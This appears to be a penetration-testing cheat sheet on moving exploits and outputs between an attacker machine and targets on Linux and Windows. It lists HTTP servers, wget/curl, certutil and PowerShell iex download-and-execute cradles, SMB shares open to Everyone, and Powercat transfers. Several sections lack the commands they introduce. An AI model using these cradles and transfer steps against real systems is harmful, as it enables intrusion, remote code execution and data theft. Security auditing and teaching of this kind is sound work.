Transfering Files
In this section Iβm going to enumerate difference methods to transfer files such us exploits or outputs of some scripts from our attacker machine to the target and viceversa.
In order to perform our work we have the need of transfer some files and this post collects some of this methods. Letβs see, these are some possibilities of environment that we can find during our audits.
Linux π€ to Linux π₯¶
HTTP¶
First we need to start our server with python:
python3 -m http.server port
python -m SimpleHTTPServer port
php -S 0.0.0.0:port
ruby -run -e httpd . -p port
busybox httpd -f -p port
And download our files with Linux basics on the target:
wget http://ip-addr:port/file.name
curl http://ip-addr:port/file.name -o file.name
axel -a -n 20 -o file.name https://ip-addr:port/filen.name
#Freebsd
fetch -o file.name -q -R http://ip-addr:port/file.name
Netcat / Socat¶
There are more ways with different protocols or programs to transfer our files:
And on the target:
FTP (File Transfer Protocol)¶
First we need to start our ftp server, in this case I will use the Python module pyftpdlib, that allows you to set up our ftp server very quickly. To install you run the following command:
And start the server:
Finally you can download the file on the target with:
wget ftp://ip-addr/file.name [--ftp-user=user] [--ftp-password=password]
axel -a -n 20 -o file.name ftp://ip-addr:port/filen.name
Base64 Encoding¶
This is not the best solution beause you will need to Copy & Paste the output, and if you need to transfer a big file could be so tedious. Btw this are the commands:
Copy the result and paste on your machine inside some quotes:
Linux π€ to Windows π₯¶
HTTP¶
First we need to start our server with python:
And download our files with Windows basics on the target:
Via CMD:¶
certutil -urlcache -f "http://ip-addr:port/file.name" file.name
powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file.name', 'file.name')
Via Powershell:¶
Import Powershell Script without storing in memory¶
iex (New-Object System.Net.Webclient).DownloadString('http://ip-addr:port/file.ps1')
iex (iwr 'http://ip-addr:port/file.ps1')
SMB¶
Server Message Block (SMB) is a network protocol that allows us share files, printers, etc, between nodes that are Microsoft Windows.
To start a smb server you need to invoke smbserver.py class from impacket.
And simply copy the file in the share volume to the target:
Maybe there are some others ways to transfer files between Linux and Windows, but with these methods is more than enough to do our job!
Windows π€ to Linux π₯¶
This section will be similar to previous one.
HTTP¶
If the target have python installed you can start the server in the same way:
(Be careful on windows the python script in python2.7 is http.server and not SimpleHTTPServer)
And download our files with Linux basics on the target:
SMB¶
In that case the smb server will also start on the attacker's machine (Linux). To start a smb server you need to invoke smbserver.py class from impacket:
But the differece will be the order of copy arguments:
Powercat¶
Powercat is essentially the powershell version of netcat. First need to install in yout kali Machine to download the script:
Installation: sudo apt install powercat
Then you will find the script in the following directory:
/usr/share/windows-resources/powercat/powercat.ps1
Onced transfered the script and imported the module, start the listener on the kali
And execute the following command to send the desired file.
Windows π€ to Windows π₯¶
SMB¶
First we need to create a password protected shared.
New-SmbShare -Name "share" -Path C:\Users\user\Desktop\share -FullAccess Everyone
New-SmbShare -Name "share" -Path C:\Users\user\Desktop\share -FullAccess corp\User
Once the shared the new share we need to mount it on the target machine.
Note: If an error such as
The local device name is already in use.you can delete it with:
net use Z: /delete
Finally we can list and use files: